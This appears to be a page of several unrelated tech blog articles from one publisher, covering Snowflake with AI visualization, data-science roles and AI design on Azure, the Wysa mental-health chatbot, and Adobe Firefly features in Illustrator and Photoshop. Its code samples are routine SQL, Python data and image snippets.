Large language models (LLMs) and generative Artificial Intelligence (AI) are revolutionizing productivity across enterprises and businesses. From a large data pool, one can expect benefits such as the automation of repetitive tasks and the fast generation of insights.

The pursuit of insights has driven the development of cutting-edge data storage solutions, including the Snowflake Data Cloud, which can be combined with the capabilities of artificial intelligence for visualizing data.

Let us explore the synergy between Snowflake and AI, which facilitates data exploration while empowering businesses to acquire profound insights.

Snowflake Data Cloud: the foundation for modern data warehousing

Even before we start with our exploration, it is imperative to understand how Snowflake plays a significant role in modern data warehousing. It is a cloud-based data warehousing platform known for performance, ease of use, and scalability. As it provides a flexible and secure environment for analyzing and storing data, it is an ideal choice for every enterprise that deals with diverse and large data sets.

Key features

Some of the key features of the Snowflake Data Cloud are mentioned below.

● Separation of computing and storage
Snowflake's unique architecture helps scale an organization's computing resources independently from storage, resulting in performance optimization and cost efficiency.

● Data sharing
With seamless data sharing, Snowflake helps enterprises share data between organizations, which can foster data monetization opportunities and collaboration.

● Multi-cloud support
Snowflake is compatible with the major cloud providers, allowing businesses to leverage their preferred cloud infrastructure.

Unleash the potential of AI-powered data visualization

Once you have understood the concept of Snowflake, it is time to get introduced to a game changer: AI-powered data visualization. AI algorithms have undoubtedly evolved. They assist in the analysis and exploration of complex data sets while revealing insights and patterns that can be challenging to discover through traditional methods.

Role of AI in data visualization

AI plays a significant role in data visualization. Some examples:

● Predictive analytics
Machine learning models help forecast anomalies and trends, enabling businesses and enterprises to make proactive decisions.

● Automated insights
Artificial intelligence can analyze data sets quickly, reducing the time required for manual analysis while extracting meaningful insights.

● Natural Language Processing
Natural Language Processing (NLP) algorithms can turn textual data into visual representations, making unstructured data readily accessible.

Harness the power of AI and Snowflake

Let us explore how one can combine Snowflake and artificial intelligence to empower a business to gain deeper insights.

● Data integration
The ease of integration presented by Snowflake allows organizations to centralize their data, whether that data is consolidated from IoT devices, external partners, or internal sources.
The unified data repository eventually becomes the foundation for AI-powered exploration.

Example:

1. Creating a Snowflake database and warehouse

-- Create a new Snowflake database
CREATE DATABASE my_database;

-- Create a virtual warehouse for query processing
CREATE WAREHOUSE my_warehouse
  WITH WAREHOUSE_SIZE = 'X-SMALL'
  AUTO_SUSPEND = 600
  AUTO_RESUME = TRUE;

2. Loading data into Snowflake

-- Create an external stage for data loading
CREATE OR REPLACE STAGE my_stage
URL = 's3://my-bucket/data/'
CREDENTIALS = (AWS_KEY_ID = 'your_key_id' AWS_SECRET_KEY = 'your_secret_key');

-- Copy data from the stage into a Snowflake table
COPY INTO my_table
FROM @my_stage
FILE_FORMAT = (TYPE = CSV)
ON_ERROR = 'CONTINUE';

● AI-driven code generation

One of the exciting aspects of combining AI and Snowflake is the ability of artificial intelligence to generate code for data visualization. Here is how the process works:

● Data preprocessing
AI algorithms can prepare data for visualization, reducing the burden on data engineers. They are capable of cleaning and transforming the data for visualization.

● Visualization suggestions
Artificial intelligence helps analyze data and suggests appropriate visualization types, including scatter plots, charts, bars, and more, based on the characteristics of the data set.

● Automated code generation
After a visualization type is chosen, artificial intelligence generates the code needed to create an interactive visualization. Hence, the process becomes accessible to non-technical users.

Let us see this with the help of the example below.

from sklearn.cluster import KMeans
from yellowbrick.cluster import KElbowVisualizer

# Using AI to determine the optimal number of clusters (K) in K-means
model = KMeans()
visualizer = KElbowVisualizer(model, k=(2, 10))
visualizer.fit(scaled_data)
visualizer.show()

● Interactive data exploration

With the help of AI-generated visualization, one can interact with the data effortlessly. A business can drill down, explore, and filter its data dynamically, gaining deeper real-time insights. Such a level of interactivity empowers business users to make informed, data-driven decisions without relying heavily on IT teams or data analysts.

Example:

import dash
from dash import dcc, html
from dash.dependencies import Input, Output
import plotly.express as px

app = dash.Dash(__name__)

# Define the layout of the web app
app.layout = html.Div([
    dcc.Graph(id='scatter-plot'),
    dcc.Dropdown(
        id='x-axis',
        options=[
            {'label': 'Feature 1', 'value': 'feature1'},
            {'label': 'Feature 2', 'value': 'feature2'}
        ],
        value='feature1'
    )
])

# Define callback to update the scatter plot
@app.callback(
    Output('scatter-plot', 'figure'),
    [Input('x-axis', 'value')]
)
def update_scatter_plot(selected_feature):
    fig = px.scatter(data_frame=scaled_data, x=selected_feature, y='target', title='Scatter Plot')
    fig.update_traces(marker=dict(size=5))
    return fig

if __name__ == '__main__':
    app.run_server(debug=True)

From this web application, users can interactively explore data.

Benefits of AI and Snowflake for Enterprises

● Faster decision-making
With the help of code generation and data preprocessing automation, businesses can enable faster decision-making.
Also, real-time interactive exploration helps reduce the time it takes to derive specific insights from data.

● Democratized data access
AI-generated visualizations help non-technical users explore data, democratizing access to insights. This reduces the bottleneck faced by data science teams and data analysts.

● Enhanced predictive capabilities
The AI-powered predictive analytics within Snowflake help uncover hidden patterns and trends, enabling every enterprise and business to stay ahead of the competition and make proactive decisions.

● Cost efficiency and scalability
AI-driven automation and Snowflake's scalability ensure that businesses can handle large data sets without breaking the bank.

Conclusion

In summary, the combination of the Snowflake Data Cloud and AI-powered data visualization is a game changer for enterprises and businesses looking to gain insights from their data. By automating code creation, simplifying data integration, and facilitating exploration, this collaboration empowers companies to make informed decisions based on data. As we progress in the field of data analytics, it will be crucial for organizations to embrace these technologies to remain competitive and unlock the potential of their data.

With Snowflake and AI working together, exploring data evolves from being complicated and time-consuming to becoming interactive, enlightening, and accessible for everyone. Ultimately, this transformation revolutionizes how enterprises utilize the power of their data.

Author Bio

Shankar Narayanan (aka Shanky) has worked on numerous different cloud and emerging technologies like Azure, AWS, Google Cloud, IoT, Industry 4.0, and DevOps, to name a few. He has led the architecture design and implementation for many enterprise customers and helped enable them to break the barrier and take the first step towards a long and successful cloud journey. He was one of the early adopters of Microsoft Azure and Snowflake Data Cloud. Shanky likes to contribute back to the community. He contributes to open source, is a frequently sought-after speaker, and has delivered numerous talks on Microsoft Technologies and Snowflake. He is recognized as a Data Superhero by Snowflake and a SAP Community Topic Leader by SAP.


Exploring the Roles in Building Azure AI Solutions

Olivier Mertens, Breght Van Baelen
13 Sep 2023
19 min read
This article is an excerpt from the book, Azure Data and AI Architect Handbook, by Olivier Mertens and Breght Van Baelen. Master core data architecture design concepts and Azure Data & AI services to gain a cloud data and AI architect's perspective to developing end-to-end solutions.

Introduction

Artificial Intelligence (AI) is rapidly transforming businesses across various industries. Especially with the surge in popularity of large language models such as ChatGPT, AI adoption is increasing exponentially. Microsoft Azure provides a wide range of AI services to help organizations build powerful AI solutions. In this chapter, we will explore the different AI services available on Azure, as well as the roles involved in building AI solutions, and the steps required to design, develop, and deploy AI models on Azure.

Specifically, we will cover the following:

The different roles involved in building AI solutions
The questions a data architect should ask when designing an AI solution

By the end of this article, you will have a good understanding of the role of the data architect in the world of data science. Additionally, you will have a high-level overview of what data scientists and machine learning engineers are responsible for.

Knowing the roles in data science

The Azure cloud offers an extensive range of services for use in advanced analytics and data science. Before we dive into these, it is crucial to understand the different roles in the data science ecosystem. In previous chapters, while always looking through the lens of a data architect, we saw workloads that are typically operationalized by data engineers, database administrators, and data analysts.

Up until now, the chapters followed the journey of data through a data platform, from ingestion to raw storage to transformation, data warehousing, and eventually, visualization and dashboarding. The advanced analytics component is more separated from the entire solution, in the sense that most data architectures can perform perfectly without it. This does not take away from the fact that adding advanced analytics such as machine learning predictions can be a valuable enhancement to a solution.

The environment for advanced analytics introduces some new roles. The most prominent are the data scientist and the machine learning engineer, which we will look at in a bit more detail, starting with the following figure. Other profiles include roles such as data labelers and citizen data scientists.

Figure 9.1 – An overview of the core components that each data role works with

Figure 9.1 shows a very simplified data solution with a machine learning component attached to it. This consists of a workspace to build and train machine learning models and virtual machine clusters to deploy them in production.

The data scientist is responsible for building and training the machine learning model. This is done through experimenting with data, most of the time stemming from the data lake. The data scientist will often use data from the bronze or silver tier in the data lake (i.e., the raw or semi-processed data). Data in the gold tier or the data warehouse is often transformed and aggregated in ways that make it convenient for business users to build reports with. However, the data scientist might want to perform different kinds of transformations, which focus more on the statistical relevance of certain features within the data to optimize the training performance of a machine learning model.
Regardless, in some cases, data scientists will still interact with the gold layer and the data warehouse to pull clean data for experimentation.

Using this data, data scientists will perform exploratory data analysis (EDA) to get initial insights into the dataset. This is followed by data cleaning and feature engineering, where features are transformed or new features are derived to serve as input for the machine learning model. Next up, a model is trained and evaluated, resulting in a first prototype. The experimentation does not stop here, however, as machine learning models have hyperparameters that can be adjusted, which might lead to increased performance, while still using the same dataset. This last process is called hyperparameter tuning. Once this is completed, we will arrive at the cutoff point between the responsibilities of a data scientist and a machine learning engineer.

The machine learning engineer is responsible for the machine learning operations, often referred to as MLOps. Depending on the exact definition, this usually encompasses the later stages of the machine learning model life cycle. The machine learning engineer receives the finished model from the data scientist and creates a deployment for it. This will make the model available through an API so that it can be consumed by applications and users. In later stages, the model will need to be monitored and periodically retrained, until the end of its life cycle. This is a brief summary, but the MLOps process will be explained in more detail further in this chapter.

Next, Figure 9.2 provides an overview of the processes that take place in the MLOps cycle and who the primary contributor to each step is.

Figure 9.2 – The steps of the data science workflow and their executors

Finally, what we are most interested in is the role of the cloud data architect in this environment. First, the architect has to think about the overall AI approach, part of which is deciding whether to go for custom development or not. We will dive deeper into strategy soon.

If custom machine learning model development is involved, the architect will have to decide on a data science environment, or workspace, where the data scientists can experiment.

However, the architect will have more involvement in the work of a machine learning engineer. The optimal working of MLOps is considerably more dependent on good architectural design than the typical prototyping done by data scientists. Here, the architect is responsible for deciding on deployment infrastructure, choosing the right monitoring solutions, version control for models, datasets, code, retraining strategies, and so on.

A lot of the value that an architect brings to machine learning projects comes from design choices outside of the data science suite. The data architect can greatly facilitate the work of data scientists by envisioning efficient data storing structures at the data lake level, with a strong focus on silver (and bronze) tiers with good data quality. Often, extra pipelines are required to get labeled data ready to be picked up by the data scientists.

Designing AI solutions

In this part, we will talk about the design of AI solutions, including qualification, strategy, and the responsible use of AI. Infusing AI into architecture has to be the result of some strategic consideration. The data architect should ask themself a series of questions, and find a substantiated answer, to end up with an optimal architecture.

The first set of questions is regarding the qualification of a use case.
Is AI the right solution?

This can be further related to the necessity of an inductive solution, compared to a deductive one. Business rulesets are deductive; machine learning is inductive. Business rules will provide you with a solid answer if the condition for that rule is met. Machine learning models will provide you with answers that have a high probability but are not certain.

The big advantage of machine learning is its ability to cover cases in a much more granular manner, whereas business rules must group various cases within a single condition so as to not end up with an absurd or even impossible number of rules. Look at image recognition, for example. Trying to make a rule set for every possible combination of pixels that might represent a human is simply impossible. Knowing this, evaluate the proposed use case and confirm that the usage (and correlating costs) of AI is justified for this solution.

Do we opt for pre-trained models or a custom model?

Although this question is more focused on implementation than qualification, it is crucial to answer it first, as this will directly impact the following two questions. As with most things in the broader field of IT, it comes down to not reinventing the wheel. Does your use case sound like something generic or industry-agnostic? Then there are probably existing machine learning models, often with far superior performance (general knowledge-wise) than your own data could train a model to have. Companies such as Microsoft and partners such as OpenAI invest heavily in getting these pre-trained models to cutting-edge standards.

It may be that the solution you want to create is fairly generic, but there are certain aspects that make it a bit more niche. An example could be a text analytics model in the medical industry. Text analytics models are great at the general skill of language understanding, but they might have some issues with grasping the essence of industry-specific language out of the box. In this case, an organization can provide some of its own data to fine-tune the model to increase its performance on niche tasks, while maintaining most of the general knowledge from its initial training dataset. Most of the pre-trained AI models on Azure, which reside in Azure Cognitive Services and Azure OpenAI Service, are fine-tuneable. When out-of-the-box models are not an option, then we need to look at custom development.

Is data available?

If we opt for custom development, we will need to bring our own data. The same goes for wanting to fine-tune an existing model, yet to a lesser extent. Is the data that we need available? Does the organization already have a significant volume of historical data stored in a central location? If this data is still spread across multiple platforms or sources, then this might indicate it is not the right time to implement AI. It would be more valuable to focus on increased data engineering efforts in this situation. In the case of machine learning on Azure, data is ideally stored in tiers in Azure Data Lake Storage.

Keep in mind that machine learning model training does not stop after putting it into production. The performance of the production model will be constantly monitored, and if it starts to drift over time, retraining will take place. Do the sources of our current historical data still generate an adequate volume of data to carry out retraining?

In terms of data volume, there is still a common misunderstanding that large volumes of data are a necessity for any high-performant model.
It's key to know here that even though the performance of a model still scales with the amount of training data, more and more new techniques have been developed to allow for valuable performance levels to be reached with a limited data volume.

Is the data of acceptable quality?

Just like the last question, this only counts for custom development or fine-tuning. Data quality between sources can differ immensely. There are different ways in which data can be of bad quality. Some issues can be solved easily; others can be astonishingly hard. Some examples of poor data quality are as follows:

Inaccurate data: This occurs when data is incorrect or contains errors, such as typos or missing values. This is not easy to solve and will often result in fixes required at the source.

Incomplete data: This occurs when data is missing important information or lacks the necessary details to be useful. In some cases, data scientists can use statistics to impute missing data. In other cases, it might depend on the specific model that is being developed. Certain algorithms can perform well with sparse data, while others are heavily affected by it. Knowing which exact algorithms should not be in the scope of the architect but, rather, the data scientists.

Outdated data: This occurs when data is no longer relevant or useful due to changes in circumstances or the passage of time. If this data is statistically dissimilar to data generated in the present, it is better to remove this data from the training dataset.

Duplicated data: This occurs when the same data is entered multiple times in different places, leading to inconsistencies and confusion. Luckily, this is one of the easiest data quality issues to solve.

Biased data: This occurs when data is influenced by personal biases or prejudices, leading to inaccurate or unfair conclusions. This can be notoriously hard to solve and is a well-known issue in the data science world. We will come back to this later when discussing responsible AI.

This concludes the qualifying questions on whether to implement AI or not. There is one more important topic, namely the return on investment (ROI) of the addition, but to calculate the investment, we need to have more knowledge of the exact implementation. This will be the focus of the next set of questions.

Low code or code first?

The answer to which approach should be chosen depends on people, their skill sets, and the complexity of the use case. In the vast majority of cases, code-first solutions are preferred, as they come with considerably more flexibility and versatility. Low code simplifies development a lot, often by providing drag-and-drop interfaces to create workflows (or, in this case, machine learning pipelines). While low-code solutions often benefit from rapid development, this advantage in speed is slowly shrinking. Due to advancements in libraries and packages, generic code-first models are also being developed in a shorter amount of time than before.

While code-first solutions cover a much broader set of use cases, they are simply not possible for every organization. Data scientists tend to be an expensive resource and are often fought over, with competition due to a lack of them in the labor market. Luckily, low-code platforms are advancing fast to address this issue.
This allows citizen data scientists (non-professionals) to create and train machine learning models easily, although it will still yield inferior performance compared to professional code-first development.

As a rule of thumb, if a professional data science team is present and it has already been decided that custom development is the way forward, choose a code-first solution.

What are the requirements for the AI model?

Now, we will dive deeper into the technicalities of machine learning models. Note that not all answers here must come from the data architect. It is certainly a plus if the architect can think about things such as model selection with the data scientists, but it is not expected of the role. Leave it to the data science and machine learning team to have a clear understanding of the technical requirements for the AI model and allow them to leverage their expertise.

The minimum accepted performance is probably the most straightforward. This is a defined threshold on the primary metric of a model, based on what is justifiable for the use case to progress. For instance, a model might need to have a minimum accuracy of 95% to be economically viable and continue toward production.

Next, latency is an important requirement when the model is used to make real-time predictions. The larger the model and the more calculations that need to happen (not counting parallelism), the longer it will take to make a prediction. Some use cases will require a prediction latency within milliseconds, which can be solved with lightweight model selection and specialized infrastructure.

Another requirement is the size of the model, which directly relates to the hosting costs when deployed into production, as the model will have to be loaded in RAM while the deployment runs. This is mostly a very binding requirement for IoT Edge use cases, where AI models are deployed on a small IoT device and make predictions locally before sending their results to the cloud. These devices often have very limited memory, and the data science team will have to figure out what the most efficient model is to fit on the device.

With the recently growing adoption of large language models (LLMs), such as the GPT model family, power consumption has started to become an increasingly important topic as well. Years ago, this was a negligible topic in most use cases, but with the massive size of today's cutting-edge models, it is unavoidable. Whether these models are hosted privately or in the cloud, power consumption will be an incurred cost, directly or indirectly. For natural language use cases specifically, consider whether the traditional (and significantly cheaper) text analytics models in Azure Cognitive Services can do the job at an acceptable level before heading straight for LLMs.

Batch or real-time inferencing?

When a model is finished and ready for deployment, the architect will have to decide on the type of deployment. On a high level, we should decide whether the model will be used for either batch scoring or predicting in real time.

Typically, when machine learning predictions are used to enrich data, which is already being batch processed in an OLAP scenario, the machine learning model can do periodical inferencing on large batches. The model will then be incorporated as an extra transformation step in the ETL pipeline.
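As a rough illustration of that pattern, a batch-scoring step inside an ETL pipeline might look like the following Python sketch. This is our own hedged example, not from the book; the model file, data paths, and column names are all hypothetical.

import joblib          # assuming a scikit-learn model persisted earlier
import pandas as pd

# Hypothetical batch-scoring step in an ETL pipeline: load the latest
# batch, enrich it with model predictions, and write the scored data back.
model = joblib.load("models/churn_model.pkl")         # hypothetical path

batch = pd.read_parquet("silver/customers.parquet")   # hypothetical path
features = batch[["tenure_months", "monthly_spend"]]  # hypothetical columns

# The prediction is added as an extra column, like any other transformation step
batch["churn_score"] = model.predict_proba(features)[:, 1]
batch.to_parquet("gold/customers_scored.parquet")

A scheduled run of a script like this slots naturally between the transformation and serving stages of a pipeline.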
When using machine learning models in applications, for example, where users expect an instant prediction, real-time endpoints are required.

When deploying our model to an endpoint, the architecture might differ based on the type of inferencing, which we will look into in more depth later in this chapter.

Is explainability required?

Explainable AI, often referred to as XAI, has been on the rise for quite a while now. For traditional machine learning models, it was straightforward to figure out why a model came to which conclusion, through statistical methods such as feature importance. With the rise of deep learning models, which are essentially black-box models, we come across more and more predictions that cannot be explained.

Techniques have been developed to make an approximation of the decision-making process of a black-box model. For instance, in the case of the mimic explainer, a traditional (and by nature interpretable) machine learning model is trained to mimic the black-box model and extract things, such as feature importance, from the mimic model. However, this is still an approximation and no guarantee.

Therefore, it is key to figure out how crucial explainability is for the use case. In cases that (heavily) affect humans, such as predicting credit scoring using AI, interpretability is a must. In cases with minimal or no impact on human lives, interpretability is more of a nice-to-have. In this instance, we can opt for a black-box model if this provides increased predictive performance.

What is the expected ROI?

When the qualifying questions have been answered and decisions have been made to fulfill technical requirements, we should have sufficient information to calculate an estimated ROI. This will be the final exercise before giving the green light to start implementation, or at least the development of a proof of concept.

If we know what approach to use, what kind of models to train, and which type of deployment to leverage, we can start mapping it to the right Azure service and perform a cost calculation. This is compared to the expected added value of a machine learning model.

Optimal performance of a machine learning model

As a side note to calculating the ROI, we need to have an idea of what the optimal performance level of a machine learning model is. This is where the academic and corporate worlds tend to differ. Academics focus on reaching the highest performance levels possible, whereas businesses will focus on the most efficient ratio between costs and performance. It might not make sense for a business to invest largely in a few percent increase in performance if this marginal increase is not justified by bringing adequate value to compensate.

Conclusion

This article focused on data science and AI on Azure. We started by outlining the different roles involved in a data science team, including the responsibilities of data architects, engineers, scientists, and machine learning engineers, and how the collaboration between these roles is key to building successful AI solutions.

We then focused on the role of the data architect when designing an AI solution, outlining the questions they should ask themselves for a well-architected design.

Author Bio

Olivier Mertens is a cloud solution architect for Azure data and AI at Microsoft, based in Dublin, Ireland. In this role, he assists organizations in designing their enterprise-scale data platforms and analytical workloads.
Next to his role as an architect, Olivier leads the technical AI expertise for Microsoft EMEA in the corporate market. This includes leading knowledge sharing and internal upskilling, as well as solving highly complex or strategic customer AI cases. Before his time at Microsoft, he worked as a data scientist at a Microsoft partner in Belgium.

Olivier is a lecturer on generative AI and AI solution architectures, a keynote speaker for AI, and holds a master's degree in information management, a postgraduate degree as an AI business architect, and a bachelor's degree in business management.

Breght Van Baelen is a Microsoft employee based in Dublin, Ireland, and works as a cloud solution architect for the data and AI pillar in Azure. He provides guidance to organizations building large-scale analytical platforms and data solutions. In addition, Breght was chosen as an advanced cloud expert for Power BI and is responsible for providing technical expertise in Europe, the Middle East, and Africa. Before his time at Microsoft, he worked as a data consultant at Microsoft Gold Partners in Belgium.

Breght led a team of eight data and AI consultants as a data science lead. Breght holds a master's degree in computer science from KU Leuven, specializing in AI. He also holds a bachelor's degree in computer science from the University of Hasselt.

Emotionally Intelligent AI: Transforming Healthcare with Wysa

Julian Melanson
22 Jun 2023
6 min read
Artificial Intelligence is reshaping the boundaries of industries worldwide, and healthcare is no exception. An exciting facet of this technological revolution is the emergence of empathetic AI: sophisticated algorithms designed to understand and respond to human emotions.

The advent of AI in healthcare has promised efficiency, accuracy, and predictability. However, a crucial element remained largely unexplored: the human component of empathetic understanding. Empathy, defined as the capacity to understand and share the feelings of others, is fundamental to human interactions. Especially in healthcare, a practitioner's empathy can bolster patients' immune responses and overall well-being. Unfortunately, complex emotions associated with medical errors, such as hurt, frustration, and depression, often go unaddressed. Furthermore, emotional support is strongly correlated with the prognosis of chronic diseases such as cardiovascular disorders, cancer, and diabetes, underscoring the need for empathetic care. So how can we integrate empathy into AI? To find the answer, let's examine Wysa, an AI-backed mental health service platform.

Wysa, leveraging AI's power, simulates a conversation with a chatbot to provide emotional support to users. It offers an interactive platform for people experiencing mood swings, stress, and anxiety, delivering personalized suggestions and tools to manage their mental health. This AI application extends beyond mere data processing and ventures into the realm of human psychology, demonstrating a unique fusion of technology and empathy.

In 2022, the U.S. Food and Drug Administration (FDA) awarded Wysa the Breakthrough Device Designation. This designation followed an independent, peer-reviewed clinical trial published in the Journal of Medical Internet Research (JMIR). The study demonstrated Wysa's efficacy in managing chronic musculoskeletal pain and associated depression and anxiety, positioning it as a potential game-changer in mental health care.

Wysa's toolset is primarily based on cognitive behavioral therapy (CBT), a type of psychotherapy that helps individuals change unhelpful thought patterns. It deploys a smartphone-based conversational agent to deliver CBT, effectively reducing symptoms of depression and anxiety, improving physical function, and minimizing pain interference.

The FDA Breakthrough Device program is designed to expedite the development and approval of innovative medical devices and products. By granting this designation, the FDA acknowledged Wysa's potential to transform the treatment landscape for life-threatening or irreversibly debilitating diseases. This prestigious endorsement facilitates efficient communication between Wysa and the FDA's experts, accelerating the product's development during the premarket review phase.

Wysa's success encapsulates the potential of empathetic AI to revolutionize healthcare. However, to fully capitalize on this opportunity, healthcare organizations need to revise and refine their strategies. An effective emotional support mechanism, powered by empathetic AI, can significantly enhance patient safety, satisfaction scores, and ultimately, the quality of life. For this to happen, continued development of technologies that cater to patients' emotional needs is paramount.

While AI's emergence in healthcare has often been viewed through the lens of improved efficiency and decision-making, the human touch should not be underestimated.
As Wysa demonstrates, AI has the potential to extend beyond its traditional boundaries and bring a much-needed sense of empathy into the equation. An emotionally intelligent AI could be instrumental in providing round-the-clock emotional support, thereby revolutionizing mental health care.

As we advance further into the AI era, the integration of empathy into AI systems signifies an exciting development. AI platforms like Wysa, which blend technological prowess with human-like understanding, could be a pivotal force in transforming the healthcare landscape. As empathetic AI continues to evolve, it holds the promise of bridging the gap between artificial and human intelligence, ultimately enhancing patient care in the healthcare sector.

A Step-By-Step Guide To Using Wysa

Download the App: Android users can download Wysa from the Google Play Store. If you're an Apple user, you can find Wysa in the Apple App Store.

Explore the App: Once installed, you can explore Wysa's in-app activities, which feature various educational modules, or "Packs". These packs cover a range of topics, from stress management and managing anger, to coping with school stress and improving sleep.

Engage with Wysa Bot: Each module features different "exercises" guided by the Wysa AI bot, a friendly penguin character. These exercises may involve question-answers, mindfulness activities, or short exercise videos. While all the modules can be viewed in the free app, only one exercise per module is accessible. To unlock the entire library, you'll need to upgrade to the premium app.

Consider Therapy Option: Wysa also offers a "therapy" option, which gives you access to a mental health coach and all the content in the premium version. Do note that this service is not formal therapy as provided by licensed therapists. The coaches are based in the US or India, and while they can offer support and encouragement, they are not able to provide diagnoses or treatment.

Attend Live Sessions: Live sessions are carried out through instant messaging in the app, lasting for 30 minutes each week. In between these live sessions, you can message your coach at any time and usually expect at least a daily response.

Complete Assigned Tasks: After each live session, your coach will assign you specific tasks to complete before your next session. You will complete these tasks guided by the Wysa AI bot.

Maintain Anonymity: An important feature of Wysa is its respect for user privacy. The app doesn't require you to create an account, enter your real name, or provide an email address. To get started, all you need is a nickname.

*Remember, Wysa is a tool designed to help manage stress and anxiety, improve sleep, and promote overall mental wellbeing. However, it does not replace professional psychological or medical advice. Always consult with a healthcare professional if you are in need of immediate assistance or dealing with severe mental health issues.

Summary

Artificial intelligence (AI) is transforming healthcare in many ways, including by providing new tools for mental health management. One example of an AI-powered mental health app is Wysa, which uses conversational AI to help users cope with stress, anxiety, and depression. Wysa has been clinically proven to be effective in reducing symptoms of mental illness, and it can be used as a supplement to traditional therapy or as a standalone intervention.

As AI continues to develop, it is likely that we will see even more innovative ways to use this technology to improve mental health care.
AI-powered apps like Wysa have the potential to make mental health care more accessible and affordable, and they can also help to break down the stigma around mental illnesses.

Author Bio

Julian Melanson is one of the founders of Leap Year Learning. Leap Year Learning is a cutting-edge online school that specializes in teaching creative disciplines and integrating AI tools. We believe that creativity and AI are the keys to a successful future and our courses help equip students with the skills they need to succeed in a continuously evolving world. Our seasoned instructors bring real-world experience to the virtual classroom and our interactive lessons help students reinforce their learning with hands-on activities.

No matter your background, from beginners to experts, hobbyists to professionals, Leap Year Learning is here to bring in the future of creativity, productivity, and learning!
Adobe Firefly Integrations in Illustrator and Photoshop

Joseph Labrecque
23 Aug 2023
12 min read
Adobe Firefly Overview

Adobe Firefly is a new set of generative AI tools which can be accessed via https://firefly.adobe.com/ by anyone with an Adobe ID. To learn more about Firefly… have a look at their FAQ:

Image 1: Adobe Firefly

For more information around the usage of Firefly to generate images, text effects, and more… have a look at the previous articles in this series:

• Animating Adobe Firefly Content with Adobe Animate
• Exploring Text to Image with Adobe Firefly
• Generating Text Effects with Adobe Firefly
• Adobe Firefly Feature Deep Dive
• Generative Fill with Adobe Firefly (Part I)
• Generative Fill with Adobe Firefly (Part II)
• Generative Recolor with Adobe Firefly
• Adobe Firefly and Express (beta) Integration

This current Firefly article will focus on Firefly integrations within the release version of Adobe Illustrator and the public beta version of Adobe Photoshop.

Firefly in Adobe Illustrator

Version 27.7 is the most current release of Illustrator at the time of writing, and this version contains Firefly integrations in the form of Generative Recolor (Beta).

To access this, design any vector artwork within Illustrator or open existing artwork to get started. I'm using the cat.ai file that was used to generate the cat.svg file used in the Generative Recolor with Adobe Firefly article:

Image 2: The cat vector artwork with original colors

1. Select the artwork you would like to recolor. Artwork must be selected for this to work.
2. Look to the Properties panel and locate the Quick Actions at the bottom of the panel. Click the Recolor quick action:

Image 3: Choosing the Recolor Quick action

3. By default, the Recolor overlay will open with the Recolor tab active. Switch to the Generative Recolor (Beta) tab to activate it instead:

Image 4: The Generative Recolor (Beta) view

4. You are invited to enter a prompt. I've written “northern lights green and vivid neon” as my prompt to describe the colors I'd like to see. There are also sample prompts you can click on below the prompt input box.
5. Click the Generate button once a prompt has been entered:

Image 5: Selecting a Recolor variant

A set of recolor variants is presented within the overlay. Clicking on any of these will recolor your existing artwork according to the variant look:

Image 6: Adding a specific color swatch

If you would like to provide even more guidance, you can modify the prompt and even add specific color swatches you'd like to see included in the recolored artwork.

That's it for Illustrator – very straightforward and easy to use!
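Conceptually, a recolor pass amounts to remapping the fill colors of your vector shapes onto a new palette; Firefly's contribution is choosing that palette from a text prompt. For a feel of what a plain, non-AI recolor looks like in code, here is a minimal Python sketch that swaps fill attributes in an exported SVG. The cat.svg filename matches the artwork above, but the hex values in the mapping are purely illustrative assumptions, not the actual colors in the file:

import xml.etree.ElementTree as ET

# Keep the default SVG namespace intact when writing the file back out
ET.register_namespace("", "http://www.w3.org/2000/svg")

# Illustrative palette swap (assumed values; substitute the fills in your SVG)
color_map = {
    "#f4a259": "#2de1a8",  # warm orange -> neon green
    "#5b8e7d": "#0b3d91",  # muted green -> deep night blue
}

tree = ET.parse("cat.svg")
for element in tree.iter():
    fill = element.get("fill")
    if fill in color_map:
        element.set("fill", color_map[fill])

tree.write("cat_recolored.svg")

The hand-written mapping is exactly the part Generative Recolor automates for you.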
Firefly in Adobe Photoshop (beta)

Generative Fill through Firefly is also making its way into Photoshop. While within Illustrator we have Firefly as part of the current version of the software, albeit with a beta label on the feature, with Photoshop things are a bit different:

Image 7: Generative Fill is only available in the Photoshop public beta

To make use of Firefly within Photoshop, the current release version will not cut it. You will need to install the public beta from the Creative Cloud Desktop application in order to access these features.

With that in mind, let's use Generative Fill in the Photoshop public beta to expand a photograph beyond its bounds and add in additional objects.

1. First, open a photograph in the Photoshop public beta. I'm using the Poe.jpg photograph that we previously used in the articles Generative Fill with Adobe Firefly (Parts I & II):

Image 8: The original photograph in Photoshop

2. With the photograph open, we'll add some extra space to the canvas to generate additional content and expand the image beyond its bounds. Summon the Canvas Size dialog by choosing Image > Canvas Size… from the application menu.
3. Change both the width and height values to 200 Percent:

Image 9: Expanding the size of the canvas

4. Click the OK button to close the dialog and apply the change.

The original canvas is expanded to 200 percent of its original size while the image itself remains exactly the same:

Image 10: The photograph with an expanded canvas

Generative Fill, when used in this manner to expand an image, works best by selecting portions to expand bit by bit rather than all the expanded areas at once. It is also beneficial to select parts of the original image you want to expand from. This feeds and directs the Firefly AI.
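As an aside, if you ever want to reproduce this canvas expansion outside of Photoshop, for example to prepare a whole batch of photographs before filling them, the same 200-percent, center-anchored expansion is straightforward to script. Here is a minimal Pillow sketch, assuming a local Poe.jpg and using plain white for the new border pixels (in Photoshop, these would be the empty areas Generative Fill paints in):

from PIL import Image

# Open the source photograph (filename mirrors the example above)
img = Image.open("Poe.jpg")

# Double the canvas in both dimensions, anchoring the photo at the
# center, just like Image > Canvas Size... at 200 Percent
new_size = (img.width * 2, img.height * 2)
canvas = Image.new("RGB", new_size, "white")
offset = ((new_size[0] - img.width) // 2, (new_size[1] - img.height) // 2)
canvas.paste(img, offset)

canvas.save("Poe_expanded.png")

The white border here is just placeholder pixels; the generative step itself still happens inside Photoshop.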
5. Using the Rectangular Marquee tool, make such a selection across either the top, bottom, left, or right portions of the document:

Image 11: Making a selection for Generative Fill

6. With a selection established, click Generative Fill within the contextual toolbar:

Image 12: Leaving the prompt blank allows Photoshop to make all the decisions

7. The contextual toolbar will now display a text input where you can enter a prompt to guide the process. However, in this case, we want to simply expand the image based upon the original pixels selected – so we will leave this blank with no prompt whatsoever. Click Generate to continue.
8. The AI processes the image and displays a set of variants to choose from within the Properties panel. Click the one that conforms closest to the imagery you are looking to produce and that is what will be used upon the canvas:

Image 13: Choosing a Generative Fill variant

Note that if you look to the Layers panel, you will find a new layer type has been created and added to the document layer stack:

Image 14: Generative Layers are a new layer type in Photoshop

The Generative Layer retains both the given prompt and variants so that you can continue to make changes and adjustments as needed – even following this specific point in time.

